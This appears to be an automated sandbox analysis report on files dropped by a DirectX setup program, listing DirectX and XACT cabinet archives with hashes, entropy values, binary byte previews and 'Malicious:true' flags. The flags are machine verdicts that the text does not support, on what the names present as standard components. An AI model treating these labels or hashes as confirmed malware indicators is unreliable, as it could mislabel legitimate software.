                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1406942 bytes, 5 files, at 0x44 +A "d3dx9_31_x64.cat" +A "d3dx9_31.dll", flags 0x4, ID 6653, number 1, extra bytes 20 in head, 124 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1416110
                                                                                              Entropy (8bit):7.999689455720137
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:DapRo0d7USayTXsV6ZMwksqb7CL7eRS3OnQdPIKoQZvkGVOxtWcjxWO3ehFWG492:DU+0wyTXsMiw+OORhQRdZLdc1BehFV4g
                                                                                              MD5:EDBA7BC2A22F3186420C271B7291DCA3
                                                                                              SHA1:65483DB4269BE348528FD205239B811D775421CA
                                                                                              SHA-256:4F5CFFA56FD44F7775F12FC511A1E3F030C05AC78484F6866B12B82979067C22
                                                                                              SHA-512:90A9FDAD3D7F933DA8C3731E42D262034907D8088B85D7100BE46C57DEF02B436C31EB9FF144B9D67FD931F92A1677EC0CD762D9AAF066BB026F139499BA3A66
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....w......D............................w...#..............|.............<5m. .d3dx9_31_x64.cat...<.......<5.. .d3dx9_31.dll.......<...<5.. .infinst.exe.....'.=...<5.. .d3dx9_31_x64.inf.&.....=...<5.. .oct2006_d3dx9_31_x64.inf...l.9..[.... .......$a.V...>.H.!D;..mw.U............u..J..kAE.-....Z..-..kZ..FFf.........w.......Z...UpO..\.>?D.uJ;..nq.....w.........6.......|.G&U....Z.*U!cZF.A!..&R.$......u........[(o.o..{...yr.0c..*R..:.*.&...b....?P.i....._..\....w..4z....)..z...d:..B.'|/....O.j..h..............G1.....|^l...2..'.J0*AT.H"..T...@].....|,.....;..9.RL...r...Z...}.....\j..*.UGZK.\ .t..K.-.... $.r.5...e...#...9@..%.X..`s.........o..O.`..5.&...........w.....P/;~ZA~&..D..Ao.z...GW.......$..+......_.R{...C....#?..5.`.....-.y.o/.a.[....[..x._.s....x9.~.N..|.kyU.............o.. .S...f...i....3...(,..SyKM1kdv...q.b<...e.{..K.....F...Z..d(s.....1.......v..K.H=H..%...=...~..m}.C......|..h.UV../.H+HS|...{.<...Q...3.P.U...Z.....O1>.:X.p..5
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 132057 bytes, 5 files, at 0x44 +A "xact2_4_x86.cat" +A "x3daudio1_1.dll", flags 0x4, ID 7347, number 1, extra bytes 20 in head, 9 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):141225
                                                                                              Entropy (8bit):7.994197909856769
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:s0cnkrYXa8cJVIajswPlOA//GNzLriX5MMP6:s0OkrcajIaw+neN+XaMy
                                                                                              MD5:4FD2B859952C008DE0542053B15BF0D1
                                                                                              SHA1:0800CEC84B51FC6362C871FAB87A09DB5C4AD6D4
                                                                                              SHA-256:F6B6EBC9C239C5263AAFAA63FD691DA5AA715E9C794D5FD663E86559D5C6AE56
                                                                                              SHA-512:D656C3BFE4593EA9084A5D09F0173C8F6B7D6229FC7E3F6757AC03089CFA94A7337BBEF0456785B79D777B976F5A8259056D2DDCFE0F74D78C304A02BCEE0AD8
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..................! ........<5p. .xact2_4_x86.cat..;..! ....<5n. .x3daudio1_1.dll.....9[....<5.. .xactengine2_4.dll.W...Q.....<5.. .oct2006_xact_x86.inf...........<5.. .xact2_4_x86.inf....)l:..CK.|.\.........." .DE...N..!.*.....A.\....."*.x>...Q\<V.X.k.Q.W].u3bDWWQP.Bt.|.......~.....?'.twuUuuuUu..-^..=d~...z....".>.t...W...b..Q...^D...=T.B....PJ..5.:...t4@..Bg..j.{zR..]-O.'.....]pwG7G.......wA.".....bI.s.../..?g..nw....t.F..#.\......9...A........N...x...q.......R..p|<n.......$.!.T,....0.&.{...V]4@7.w...r..<..@[.w.z."..S?..J.F.a.c.. ...F. q.1{..Ov..`\..I./.B.../.N ./....~s.T*h.2....`...(.)B@}.!.........?.Z...r.9.;...n....D|_.p.,4.. ...........$|....b...Q.....r4.&N..w.,.O......$z.....F... ......A.....H2$#N......D.u%...%?...>._...DY.m..O.k.7Y....1..".......,h.......,l,..;.JgS0.....p.n....%......H.k.Hv.46.t.?.R8....x....F..Lq.... ..:...y......K..k..[..;...^[!.....F.P...}V5...}_7...q..z.b#...PFFEZ$].:.k......-
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 176401 bytes, 6 files, at 0x44 +A "xact2_4_x64.cat" +A "x3daudio1_1.dll", flags 0x4, ID 8466, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):185569
                                                                                              Entropy (8bit):7.996440771278114
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:m3ZITAOIgaJqZazyaNuGKQb5aML7XTXM9+37VD5d58Oxz+oKG+ONa8bW9uMBowLB:iImMo2aHb0MvDn3jdhzWONFob
                                                                                              MD5:CC568D26B5B4CDA021D528CF75B21699
                                                                                              SHA1:DD47A33950C9E3A88DEFCAA7EA331FB1F1BBAB97
                                                                                              SHA-256:662D4E5D005CDBA02FABB0D7A68A7B48ECAFDEBE21718D892833D5C482E5ADD7
                                                                                              SHA-512:24B53BBD82DEC594D9909352D1F2AFE69B6F082DB99AAB3385826C4E8D22F5C075F3C5A24C8104DBEEF2D894980319AF141C65D768A51936C75092A846F3C8AA
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................!...............#..................! ........<5o. .xact2_4_x64.cat..E..! ....<5o. .x3daudio1_1.dll.....9e....<5.. .xactengine2_4.dll.....Q.....<5.. .infinst.exe.....i.....<5.. .oct2006_xact_x64.inf...........<5.. .xact2_4_x64.inf...~.x:..[.....0...R.P...O....5H"... .I.XA.D..MtT....A..MJ....$."=P).y.IB.EJ..".`4..f.{..n..Z.....|w..5@.!&. ..Gm..D..M.@.<[....9gea..8e..C.b_....... .....D".f.@......gP|..B...2......{.........'.3H..K.RU...B....{.......).....m.I@ ...Q]....(.'$..'...._4....J^.._......R)0i(b......_./.....80.@..H.H......?..%N.F.<.>...".gt.P..........'.....7R.@.....6.....P.V...X.od..$....Oy.......} "o.}...HWza..../.%..d..o.F..q...D+...)..."..C... .2.8..f....<..=N...c.Z4[v'.......f...i,.....P...s7...K'...:..A..bW.......S%v.##3...c..Q..+.$kQ..2.....,..=^../'.._!.D.......$.T.n..Z..'.@.2....O...:Y'...@...?./......"Ti2}...N..=.kq...x.T.?.Tq.?..?IB....N.x..=.CTl........V9y.sCay............D.Q.'.?.8..8.....<A......).$'..g
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1565194 bytes, 5 files, at 0x44 +A "d3dx9_32_x64.cat" +A "d3dx9_32.dll", flags 0x4, ID 6631, number 1, extra bytes 20 in head, 137 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1574362
                                                                                              Entropy (8bit):7.999757508861621
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:AbmMc7lXv7PY1QKs16rjZ1w00Z2xgaJgYRf4MyHGktr3+mlQmxHw8gEeGrs+RDb1:Km7lXk1Zs1Mj0SgyqP3RvxQX7G3H1
                                                                                              MD5:2290064562F2D6D197765F4EDEBC5BF0
                                                                                              SHA1:70C2E3C3EB521BA4C46C428D57166631F86512C8
                                                                                              SHA-256:DA1CE01BE39F41F967282849715E8310DC1887BFEB92C4E0166D2C31F00647F7
                                                                                              SHA-512:B25A517DE79668E3ABD88ACDE835DF4A0D69E70CE0E001DB31D5DEBCD812BCE46F4ADA5E07C036C7BBE88D6DFC9F6531B2198F03FC27FA46070C790B45955DEC
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#.............................5.a .d3dx9_32_x64.cat...C.......}5.h .d3dx9_32.dll......<C....5T_ .infinst.exe.....'CD....5.` .d3dx9_32_x64.inf.&....ED....5.` .dec2006_d3dx9_32_x64.inf... .....[...J .*.M.P..%A.P...?..O..V..=Z!R._...DQ..E..ha.;.CZ.D.....u8h..A....."3DW4.......o........I...-.[...L..X...ns.xm..M...os.$.cu=.k...Y.=M<.m.'..y.5...k..K.....7.k.B.$.p!E ......bf....n1...4..........T...{.7..........]&.{l7.g..6-.M.k.-3.j]6......m.......<.M..... ...ibM.@..=.....1....@....!4..A..bIxR.3..=.|@i../....f..R NO..7.N..+....SJ..b5)......(.S..5U..6...hG..b..7.....Ye..yu....^`.+.A...x.wn..NI.......>Ld..+|.ij&.4o..2Q.r.$.....}&l...d...|K......_.+.aSP.>...6@A...)\..kL...R.....F.b$~.."...e.):n......^..7..:.3$h~G.EA.A:..8).i......U....L..*PU.....s..$...v.-.:.u..:.DM...Y.......].x...<.z...`y.K...)d.{`......:.c......w.k....?.wU@...r....~.T....j.wg......K./...&,...?......:g....bZ.K#..^<..?...}.q.r....9.;.2..Mh<
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 139639 bytes, 5 files, at 0x44 +A "xact2_5_x86.cat" +A "x3daudio1_1.dll", flags 0x4, ID 7324, number 1, extra bytes 20 in head, 9 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):148831
                                                                                              Entropy (8bit):7.993942345904899
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:kF/u2w4VarOr9vE3eKgpEUcXDlkCAMsukGtnJW+ATOcfKy:kF/JWg9vE3eKzXDeMpNnUOcfKy
                                                                                              MD5:082B7D69F96799AA2AB1A8EA1FA2AB88
                                                                                              SHA1:75C7032B749259977C947A5103F9A4B92C2025DE
                                                                                              SHA-256:B98E55C654B9EE6F6D040665D932BEA7A1299C56CC9996EEA900AC4F5649C7D3
                                                                                              SHA-512:57C96A4C99AB9A7D33A8CC81A3B4E2AB58FE3A2FBC7F79AD688C7D0257D281C662D4CE0737F68C00D15F715BC6177D2FF9CC32A69CFB77216265FA56FF79DD8A
                                                                                              Malicious:true
                                                                                              Preview:MSCF....w!......D...........................w!...#..................! .........5.a .xact2_5_x86.cat..;..! ....o5.\ .x3daudio1_1.dll.....9[.....5@` .xactengine2_5.dll.W...Q2.....5.` .dec2006_xact_x86.inf......8.....5.` .xact2_5_x86.inf.@.u..;..CK.|.\S.........EY...E.......A..M..dk.P\.DT..V..Rq..R.*.(..V.[m........E....}...}.......{g..9g.9....x!.ZGo....o.)..B...........a8.....^H....C.S.].)e....U.,.}..E...a7..+.......xv.>..H......N.Sp#-t*.J...)...c0'....1w... ..9c8..8.~NP........O7(.b....%.u...T..-.....9*.;........H...~c 7.n>.A9.........W....#..@..p!.G.R1\....B.N.'..Z.c|0..(+.l...<._(6..cYX:&.$p.F?.VK.t.....[|,....q.b.....AS6...h.I.G....1 ...z.....J.j.~..-.H...@.z>.. M...{.".........o7...-....E..C..6..................`...... m)..ad.#.5...p.....j..j|..w...#.j]..BZ.......?oK...=_L.bDD..{.VK^...qe.../x.5.,h....1.".l,.x...N..)..N.A............%.H.k.Dv.4Kd......,..f...lB.QO6.N.(`..D..<W+......j....d....{o..t...e4*.Je.=.w.....773....q...Ha@.*..Q..I.1.N....4
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 186515 bytes, 6 files, at 0x44 +A "xact2_5_x64.cat" +A "x3daudio1_1.dll", flags 0x4, ID 8443, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):144891
                                                                                              Entropy (8bit):7.997618513042835
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:ZCISkfUHof5yPnSKfEGMKBQ0sncpIt1EXRN0F+jTx8bh44VhRjR+t2h5fjJfn2EL:ZNdUIRanSK8Gd0nKIAN0F+RWugXRa2bz
                                                                                              MD5:219ABD58672661EA814E3739729DDC04
                                                                                              SHA1:3CFB7D0AE07A9FDA3D77AC761BAC4243ACA961F0
                                                                                              SHA-256:56AEAE85E4E85FCD50D2733371C4977602B720EE72522FE24ED93605BE037C69
                                                                                              SHA-512:8B0EE032677EA0CEC388C017A3AF5FD404F2F26191203D372EF8E95B19F16E669473039C70287B58759422D6DCACD3A1D45A6F13D85952CF5DFD56EC63EADF02
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................ ...............#..................! .........5.a .xact2_5_x64.cat..E..! ....o5.\ .x3daudio1_1.dll.....9e.....5.` .xactengine2_5.dll.....QZ.....5T_ .infinst.exe.....ia.....5.` .dec2006_xact_x64.inf......d.....5.` .xact2_5_x64.inf....V.:..[.........A.P$..O.v..lM.!I.S.T..FJ%;..R.U..pj&...L..:.B. .W.I.... .3.43.`...W...kK..p......-].5....)R...V..vW...mu...]].M...al..5%:..vi,C .JH..81&..$..O!(..........D#`F.5......$.!..# F...4F.....4..E......Yx...>...6.b8..a..Bh.......`..`G2.9..0%.0y!..P8.M..L...j.-?d+...2.m..S..P2,`.cg...M.....M..^.....!.U..I.(..P.....<..p..@.......]..G..A&B.HD..(\.GM.......A..^!.B.W.U.L..r....A.".....t.0`@Zw.Fa...s....C.......Q...,.N...W.C.P........|...R.^@.....2..(..3.....N....z...wd\..O,...........~...J"GQO|...4... %.I.BU..>E+Y&r.HdA[.c..,.h.../F..k...>...$d....ko."T@os...N&..'.z...FJ.y..;. ......y...]..i`.@..O.........gk...NW.B...5-.....C........']~|..HR]....'.....|.n..).2..'.dT.G.....p......k.8!^...;.e
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 142023 bytes, 5 files, at 0x44 +A "xact2_6_x86.cat" +A "x3daudio1_1.dll", flags 0x4, ID 7329, number 1, extra bytes 20 in head, 9 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):151191
                                                                                              Entropy (8bit):7.993972565562067
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:4uMWvVgAanBDv9WkUtrr/uZfQMyolbnXkFDwoY0ZwuY:BVgAutNUtrLuZfjjljgTY0JY
                                                                                              MD5:A09F7EAB35816D682E7432DBB36B047D
                                                                                              SHA1:DB67B9434ABAA8E7F166956A1C8D01F536162C21
                                                                                              SHA-256:0E3655490667DDF17150AEC089889268BDD7F1E8367D2BED6F3EB68A5FF28288
                                                                                              SHA-512:FB1CDBFB3CDD60783D1C8696EA6EFB746331880C79AA74052808CA09092CF1A2336BF784104D16203740998129B718DC0AD4A632E4031E85CCF340C593F05E57
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....*......D............................*...#...................)........86u| .xact2_6_x86.cat..;...)....(6.{ .x3daudio1_1.dll.h....d....86o{ .xactengine2_6.dll.W...&L....86.{ .feb2007_xact_x86.inf.....}R....86.{ .xact2_6_x86.inf.;{..w?..CK.wXSI..o..HQY....r..!. .....TV..0..$tTB.....(..((J......(.R.qm.E.d.... ......~...y..93..3gf~.!..Y...^..&.7q. .... .J..`.QPX..-....0... .-.C.b."0N...R.b."..b0.r..U..V.....1..ql.8..1X}.....o.%.t.."B...2...,..@...x..p..0.........AZ.D., ........x.,..C...0.k....aH.........U.V.V.....0....P...6..PeN.........../.-.^.x..z}....q........$h08..3.I,..r.........4......!...oh...x.&.C@....p(J0M....d.5......,..XHC....jf.....A.=(..P.CF..}...[..>...?.9$...K....ofa.......5.p.....g.`T.v.{Ks...."2.N..3.2.<.....x...m.y.B...=....k..|%B....!.y...kq..7..{.....j.W).,.>..>.......@..9.A...2..,.8.t`-d+.z....`.....0....6.......{.....X.0q....98.@V.....C 3v..o.x`.#..r.".`V...s.....?G6.#..2.pb.......$.....@...b.n..&....W.._..CB..c..%...HQ.U
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 188715 bytes, 6 files, at 0x44 +A "xact2_6_x64.cat" +A "x3daudio1_1.dll", flags 0x4, ID 8448, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):197883
                                                                                              Entropy (8bit):7.995921670109717
                                                                                              Encrypted:true
                                                                                              SSDEEP:6144:aX7CLQxFiIUEWXDCsi3jGg+U2p2z51zHdZ5a:78iE1sx0s
                                                                                              MD5:CC622A75240CA96FA8F28BD984BED5BC
                                                                                              SHA1:424F216C5C0E02AE654612EAEB04900C9DAFBC61
                                                                                              SHA-256:3454D5101716A5C17BCDEE8632668D981F99E8558D8D05E20A33ED718ED8C2AC
                                                                                              SHA-512:EAB36CD6BC3AE6F67D89996785F9C7D51E140BFB839A866B4E4FFA7809846DF861D30D1FCE2E1A498E8403DECA5CCBC50B8F37F4C1B4AD3CD3A63B150C49ECEF
                                                                                              Malicious:true
                                                                                              Preview:MSCF....+.......D................!..........+....#...................)........86v| .xact2_6_x64.cat..E...)....(6.{ .x3daudio1_1.dll.h....n....86w{ .xactengine2_6.dll.h...&p....869{ .infinst.exe...........86.{ .feb2007_xact_x64.inf...........86.{ .xact2_6_x64.inf.{4&.Z=..[.....0...R.P...>..s*.N{.....9..J<.....AZ.Q.PQT9'..E.I....R..(.T$..........w?.Z....Q.b......!-...&..2Un ...TCY.t(.07#..I. ..... 8...".7.... P.....F......-q..Y+."-/....}W.].......l2..]T.H@o..t..^..@1..Yd.2f.@d..?%....B.H.r.P....l$..d.3w....J...%^..!.Q..q...$...C."...t....LO....=...E..'.Pw@!...>...`...v..|Z>.?Sv~.Eb=........R.../.....A....h.....Q|.w.e.e;..h..7.P......}.?R]... ...=.."`...F.t}>0...>.../`!...>..8......W.+.a....!@.`d.....p.b.!}..4..ma%..<..+8.%X.....u....v...C.;iW...0.}"....h...|*/r......c_...Y.p.F(G..N......o..#....P........).(........+.;...O...iOK.,.........A.x.k.....~..l....@.$z.D....C=b....S..}.+....7... .~...n..%XM...c_.'..B........\.....0..?.7...m7~......n@..Q...Y......._.f
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1601398 bytes, 6 files, at 0x44 +A "d3dx9_33_x64.cat" +A "d3dx9_33.dll", flags 0x4, ID 8295, number 1, extra bytes 20 in head, 140 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1610566
                                                                                              Entropy (8bit):7.999804070832858
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:NjzSeifTXjfzuO/m35sCqSrSBEZqyi2bjbBfQbIKpP5FfiB0Qjq/X1ZXp8e:NvSeSTXj7u0OUM9UStQbNd/Gjq/FD
                                                                                              MD5:F33C12F535DC4121E07938629BC6F5B2
                                                                                              SHA1:6B93FBE3D419670A71813E087D289B77E58E482B
                                                                                              SHA-256:3CA2ACF6B952D6438B91E540F39ABCB93EE12E340BA1302F7406F01568E5CF91
                                                                                              SHA-512:DF1753AB43D5B7FDE2A5EB65A77B37BA28599BC0683A4306F101C75F82B0F1A2C8DDF5741981073CC5DF26E9EA38C9A495ED0FB1689D2E7FC7D6F693759C822A
                                                                                              Malicious:true
                                                                                              Preview:MSCF....vo......D...............g ..........vo...#...................(.........6{. .d3dx9_33_x64.cat.h.D..(....l6O. .d3dx9_33.dll.h.....D....6.. .infinst.exe.,...h.E....6C. .apr2007_d3dx9_33_x64.inf.......E....6B. .d3dx9_33_x64.inf...../.E....6B. .d3dx9_33_x64_xp.inf...'+....[...S g.uM....5!.f...O..v.f.......t.nn$$....d.].Up.$..*...Z2]T.B.FB-.5..I.c3CF3..g....^....=.7....ZF..J.j.c..q..R.....K.6VW..j.9j.+.....J.N.t|6....K..(......-4Fpq...of..@na......A...X.jg..5D...~...........T.....ymsv..f..'"m..k..?..d..=/M..\..3..!.%)....)....v.7l.%.$$.(!RR..@.e.. ........ EfP.h.H......^Q^C.c.u.....u..6......PD...I.\$.J=BX.7..d..H|...h.5zen.Y...KsJ.wk..m.{...KRJ.JJ0t..u/$.N..:..y<...).......)Tjg..GL.=.7.4wGV..|.B.4`.{.})?.#..O..0|.J.NN.9......|u.N_Xi2....$.'..,.......}.j'..... ......I..M...h...&W.$. ..9rs.;.])*...SER.SMDhBS..D.gTFD..0M...E.....D.o..:}du[....b..Y#..`...9.<.'G.:..Q...y'._..|....\1O.o).$..(.')$..`.'oB...jF.%...w....cQ....`.o...k<..[...T....o%
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 692652 bytes, 7 files, at 0x44 +A "d3dx10_33_x64.cat" +A "d3dcompiler_33.dll", flags 0x4, ID 10164, number 1, extra bytes 20 in head, 61 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):701820
                                                                                              Entropy (8bit):7.999560976493214
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:RK6/uIaEOb2fc+HdQn/lDTK79RrFEYnj3LUFWQJcR1WrADy2IYxUSsEtiqUoY:RUlb2fc+9Qn/u9RrFEO3LUjU95I/EtiL
                                                                                              MD5:906318E8C444DAAAEA30550D5024F235
                                                                                              SHA1:3F3DCCF0A8A1CBF6F603BE1DA02E1E2BF89D24FC
                                                                                              SHA-256:1A37565C5B868B6A5C67F3E24B8AF547506799444CB77C7086E7B0CEC852F239
                                                                                              SHA-512:0A7AED2F49EA3DCBCA1607FC46F166A44BC9D08589DB05051B422C8AD84ADF322352F71333367C612F9579B4AACB4CD6B82489DDF168AD67FB4D42AB52999C88
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................'...............#..........4...=....).........6.. .d3dx10_33_x64.cat.p]...)....l6O. .d3dcompiler_33.dll.h...2.....o6=. .d3dx10_33.dll.h....B.....6.. .infinst.exe.L....T.....6F. .apr2007_d3dx10_33_x64.inf.....NW.....6F. .d3dx10_33_x64.inf......Z.....6F. .d3dx10_33_x64_xp.inf.d7$....[.....@.....P...O...u..AA.?.nE.DW.$.3B..BU.H...!.W..".J.^.IJ$(....hD.......vo?.$ef . t.=.......p.H.P.D&..t@..\..sCb!1i..O...........w................l{......d...-....Q.\.......xCNH....+.%"..;..o..DD..r.4B."...H`.?.P&.....>"(...E..HT.Q....:..e9 .{.j%...e.....$.p..R.....;.%!..>.....G......*.....x.~.@.....H.K....P?.w.^....7.R.RW ../p..w, Y..bu W.r.h.T..$Q.....\z....V_.^..N0=....K~.>.$v.}...y7"!.w...s..@b....~\.ily........Y....l.`.^.?y...w.. ....]..)...R1....... ...#......G...J.F.0x1.6^S>.*/.x..p..............(.B..$.....r.....CO9.R.1..a.a..})..^.h...+.P..}-?Z..H..t....U..gO..M.].l.2..........*.d.N6G...I..=..L=O...........:.....*...... .......2.c.?'.<1..w......?..E
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 145265 bytes, 6 files, at 0x44 +A "xact2_7_x86.cat" +A "x3daudio1_1.dll", flags 0x4, ID 9001, number 1, extra bytes 20 in head, 9 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):154433
                                                                                              Entropy (8bit):7.994491966822324
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:BcJ4S2kOBrMASnHr7M58QmpeFT7582Skd1ksaIwbhQDp9kkIFxYJQZW9379+:BQ4S2kOi/MKbSV82xKnDVQ/EqQZa3k
                                                                                              MD5:8922189C0A46D26B2C52C65515D87180
                                                                                              SHA1:27830C01AFB15158186A045B7224EF33793AD211
                                                                                              SHA-256:39F970BF4CC42E9325ADA84A603C6C691BF94921385A52325F402F7432ACE697
                                                                                              SHA-512:53D51CAA2CF448681A709F2B9737EF75DEA4E9A46E2B29E6588B13E941671643A64D3597649AA2AE0B1FE9E5D591ED00BAD9FF3344CA62851E03A68279142CAB
                                                                                              Malicious:true
                                                                                              Preview:MSCF....q7......D...............)#..........q7...#...................).........6.. .xact2_7_x86.cat..;...)....e6Ie .x3daudio1_1.dll.h....d.....6.. .xactengine2_7.dll.o...Bb.....6D. .apr2007_xact_x86.inf......h.....6D. .xact2_7_x86.inf.....:l.....6D. .xact2_7_x86_xp.inf..IL..9..CK..8.....Y.$K%;..93..E.R....cd.....lm.*..5!Zme..!.)e.}.$)....f...z....^]W.\.s.....~~.=....*n.E1.1.P<.t..3.)..B....7....Z...,l.7.*7..b..Q.,l.l....._..Q(.....n....ys..g....D@.Z..........Z1A..R......F.,:.[&"Z....E..rzH...1..)..#..L....p......C...6..z;4....dW"....]...&PR...^.p.0..U...[.a.@...9<.......F..@...h........a..As...g.FJ#.....@...d.BA......0..Xq.7o.-.....S9.....;_....L..x...3`......v..el........./....L9...K..=u^.-s..R...N.>84.~...=%..cG....Mh.....sd3xfG...JsN...6.'.....)./1...S..7....@mZ.....7...W..'..wY.US[Y...`..&'..9.~^.-h..a1.Y(.0?M.].NG.H..@..:......&4v&.Aa..N..~3Z..d.9.....H....x..`.s..L;..f.7jB@.Tc..}.....A%..Ej...&..!_d.i2q..3M........(`.?.c.(4Z..Av...4........?..B
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 189806 bytes, 7 files, at 0x44 +A "xact2_7_x64.cat" +A "x3daudio1_1.dll", flags 0x4, ID 10116, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):198974
                                                                                              Entropy (8bit):7.996718266567073
                                                                                              Encrypted:true
                                                                                              SSDEEP:6144:kr+0amjUgjJG0HRzMUxWDJkUMP9KeK17dq569:krPVzjf+pk9keKdq5q
                                                                                              MD5:FBB6AA140D5D0AA28A7561EA15D69E72
                                                                                              SHA1:26804276EDBB1EE23B96690B40A01BB9C723F7DA
                                                                                              SHA-256:7781F0494648989583D4AC7695B9C5310EEA76B6A102E15EA0FC7376250E4584
                                                                                              SHA-512:08D6F2EF3346229F71E9FD6904D99BCB69F0A03CBD2D428F0A3BA58836694B801446165814AEE120B4C5EB7046184B08FB49248F5E1941579B9CAEAF9FBA1B1A
                                                                                              Malicious:true
                                                                                              Preview:MSCF....n.......D................'..........n....#..........*........).........6.. .xact2_7_x64.cat..E...)....e6Ge .x3daudio1_1.dll.h'...n.....6. .xactengine2_7.dll.h...B......6.. .infinst.exe............6D. .apr2007_xact_x64.inf.....B......6D. .xact2_7_x64.inf.%...E......6D. .xact2_7_x64_xp.inf.t%...8..[......[..1.P$.._.ww.U..UD*:WB...R..%D.J.?III].o7I. .o..7...._..1..3. ......@.......{.tz......-n.....n(..j..Z...m...[.dgi/wb.q...Cl..M.8.jmh|....h&"P`B ..%...c>..... .....D4...P..fo..D.....0.@...m...!...mT.......ir..q+)..r...*...o".D(.@A.)+.(..3..(.G.}.L ..p.....aF..,)..$.cr.1...J..%..|.)..=.K.H..Ep.....K..^...m6.......P....N@..I.|.|.'....@a.. "....H.d...1....&.!D......{.X-..\.S;0NOe.3,&......a.S~..;wd...R.Zt.7...J~..n.'.......J.e..'H.........@.~....T@..........y......8(2....9.p:...^...y...$....X*..b...c.N.Dprnd).$..d.mIv.,G.D.#..A..].1..A.L$].7`...;...L.....B!.....:..EA..1.V..?J.7..7...T.Bz....]..%t.7.F..5G:......."H..O9.....sAk.q.}1U.'I........o.t...jr.`v..
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1601814 bytes, 6 files, at 0x44 +A "d3dx9_34_x64.cat" +A "d3dx9_34.dll", flags 0x4, ID 8310, number 1, extra bytes 20 in head, 140 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1611006
                                                                                              Entropy (8bit):7.999795394912666
                                                                                              Encrypted:true
                                                                                              SSDEEP:49152:dyO6V3G0SAcId5iPNJKbtZJSlR3Q0872iOda:dyDlSA/5iPNY7Jo3GPOda
                                                                                              MD5:8DBAA3047397EE4CFCA2EFFFCC2DFBD1
                                                                                              SHA1:D88FAD72D7EAF38B8469B2B8492311C39C42BE04
                                                                                              SHA-256:FE4B15931E048C97CBBC26F753093E7D41ECCF174402542631284F8BDB9EE692
                                                                                              SHA-512:1CE01BF0BD4C0D832D95B13E958DA6CB69C0D3949B128FCF40EC59ECC0AD8989B27C91EAC28CD98777D57DFEB811CC1077FDB87348A11B6370D806771D7E742D
                                                                                              Malicious:true
